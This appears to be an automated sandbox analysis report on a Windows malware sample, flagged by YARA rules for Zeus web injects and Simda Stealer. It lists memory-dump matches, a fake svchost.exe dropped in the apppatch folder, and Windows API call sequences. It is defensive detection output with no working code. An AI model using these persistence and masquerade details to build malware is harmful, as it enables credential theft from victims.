Source: 00000002.00000003.1963250031.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000026.00000002.1991998066.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1992856341.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1815491557.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1994050836.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1458207873.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1907200563.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1984832465.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1935549687.0000000001200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1810656396.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000026.00000002.1991709433.0000000002C00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2000637798.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1991348286.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1823534171.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1882456143.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.1916004272.0000000002A60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1962925986.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000023.00000002.2052985778.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000020.00000002.2064304121.0000000002840000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1936970508.0000000001320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1995104325.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1963615191.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000020.00000002.2056434663.00000000026B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1899640794.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000014.00000002.1898050136.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2011646276.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1937351360.0000000001380000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1992107371.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1980820181.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1964296820.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.1894178366.0000000002A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000A.00000002.1940866370.0000000003070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2000260170.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1963816092.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.1906960513.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1953762470.000000000ED00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1984425254.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000A.00000002.1943305461.0000000003210000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1930720915.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001E.00000002.2074493087.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1962281793.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2691342691.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1960879139.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1937317769.0000000001410000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2017537084.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1984646788.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1992581990.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001E.00000002.2063346012.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000F.00000002.1874297883.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000023.00000002.2053120888.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1873423952.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1841520196.000000000F340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1994473881.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.1911179292.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1964748612.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1455296736.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.1899368962.0000000002CF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1981345088.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2017774117.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000D.00000002.1947004651.0000000003160000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000D.00000002.1943298176.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: WlCVLbzNph.exe PID: 6788, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 1736, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 5584, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 3804, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 1364, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 2232, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 6644, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 4864, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 7160, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 2688, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 1992, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 2800, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 7128, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 6048, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 5636, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Yara detected Simda Stealer
Source: Yara matchFile source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.WlCVLbzNph.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.3.svchost.exe.881000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.WlCVLbzNph.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.3.WlCVLbzNph.exe.5c32a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.1455296736.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: WlCVLbzNph.exe PID: 6788, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1736, type: MEMORYSTR
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02C76A30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C73940 VirtualQuery,VirtualQuery,VirtualQuery,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,2_2_02C73940
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01413940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,5_2_01413940
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01383940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,6_2_01383940
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03213940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,10_2_03213940
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004020B0: CreateFileA,VirtualAlloc,DeviceIoControl,CloseHandle,0_2_004020B0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004017F0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,0_2_004017F0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile created: C:\Windows\apppatch\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004339800_2_00433980
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0043F1900_2_0043F190
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0044599D0_2_0044599D
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0040DA500_2_0040DA50
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004422500_2_00442250
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00440A600_2_00440A60
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004442800_2_00444280
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0043E3400_2_0043E340
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004483600_2_00448360
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004223800_2_00422380
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00439B900_2_00439B90
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00443BB00_2_00443BB0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004434E00_2_004434E0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0043A4F00_2_0043A4F0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0040DDA00_2_0040DDA0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0043FE000_2_0043FE00
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004416C00_2_004416C0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0043A6D00_2_0043A6D0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004386F00_2_004386F0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0042CF600_2_0042CF60
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0040DFC00_2_0040DFC0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_0044BFE30_2_0044BFE3
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00408FB00_2_00408FB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004339802_2_00433980
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043F1902_2_0043F190
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044599D2_2_0044599D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040DA502_2_0040DA50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004422502_2_00442250
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00440A602_2_00440A60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004442802_2_00444280
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043E3402_2_0043E340
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004483602_2_00448360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004223802_2_00422380
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00439B902_2_00439B90
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00443BB02_2_00443BB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004434E02_2_004434E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043A4F02_2_0043A4F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040DDA02_2_0040DDA0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043FE002_2_0043FE00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004416C02_2_004416C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043A6D02_2_0043A6D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004386F02_2_004386F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0042CF602_2_0042CF60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040DFC02_2_0040DFC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044BFE32_2_0044BFE3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00408FB02_2_00408FB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C72BB02_2_02C72BB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAB2C02_2_02CAB2C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA42D02_2_02CA42D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA22F02_2_02CA22F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAF2402_2_02CAF240
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA9A002_2_02CA9A00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C77BC02_2_02C77BC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C96B602_2_02C96B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAD0E02_2_02CAD0E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA40F02_2_02CA40F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB61E32_2_02CB61E3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C779A02_2_02C779A0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CADE802_2_02CADE80
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C776502_2_02C77650
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CABE502_2_02CABE50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAA6602_2_02CAA660
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BF802_2_02C8BF80
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA37902_2_02CA3790
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAD7B02_2_02CAD7B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA7F402_2_02CA7F40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB1F602_2_02CB1F60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9D5802_2_02C9D580
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA8D902_2_02CA8D90
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DF2802_2_029DF280
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A8A502_2_029A8A50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DD2502_2_029DD250
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DBA602_2_029DBA60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D4B902_2_029D4B90
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029BD3802_2_029BD380
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DEBB02_2_029DEBB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D93402_2_029D9340
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E33602_2_029E3360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E099D2_2_029E099D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DA1902_2_029DA190
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029CE9802_2_029CE980
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D56D02_2_029D56D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DC6C02_2_029DC6C0
